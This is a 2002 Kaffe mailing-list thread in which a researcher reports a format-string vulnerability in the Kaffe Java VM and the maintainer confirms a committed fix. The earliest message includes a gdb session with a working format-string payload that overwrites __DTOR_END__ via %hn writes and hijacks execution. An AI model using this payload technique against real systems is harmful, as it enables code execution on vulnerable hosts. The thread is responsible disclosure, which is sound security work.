Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick kaffe@rufus.w3.org
Fri, 12 Apr 2002 21:38:10 -0700


I don't think anybody behind those email addresses was paying any attention
a few months ago.  :-)

We've got a lot of work to do on the security front yet, but it would be
good if we can get rid of some of the obvious bugs as soon as they are
identified.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: "Jim Pick" <jim@kaffe.org>
Cc: <kaffe@rufus.w3.org>; <recon@snosoft.com>
Sent: Friday, April 12, 2002 10:05 PM
Subject: Re: Kaffe Exploit is almost finished... second warning for format
strings issue.


> No problem... do you know why this went unnoticed for a while? I think I
> mailed it to every mail address I could find on your web site a few
> months back... I even tryed to stuff it in your online bug form thing.
>
> My concern was for things along the line of JanOS and KaffeOS... or java
> network apps that allow clients to make class requests... servlet
> engines and things of that nature...
> -KF
>
>
> Jim Pick wrote:
>
> >Oooh, that's bad.
> >
> >I just committed a fix.  Thanks for the heads up.
> >
> >Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe
to
> >run untrusted code until we've fully implemented things like the
verifier.
> >I'll cc: the list so that people know about this.
> >
> >Cheers,
> >
> > - Jim
> >
> >----- Original Message -----
> >From: "KF" <dotslash@snosoft.com>
> >To: <jim@kaffe.org>
> >Sent: Friday, April 12, 2002 8:03 AM
> >Subject: Kaffe Exploit is almost finished... second warning for format
> >strings issue.
> >
> >
> >>0804b6c8 ? __DTOR_END__
> >>[itchie@ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> >>(gdb) r  AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
> >>        at java.lang.Class.forName(Class.java:native)
> >>        at java.lang.Class.forName(Class.java:52)
> >>
> >>Program received signal SIGSEGV, Segmentation fault.
> >>0xbfffff9a in ?? ()
> >>
> >>
> >>-KF
> >>
> >>
> >>
> >
> >
>
>
>
>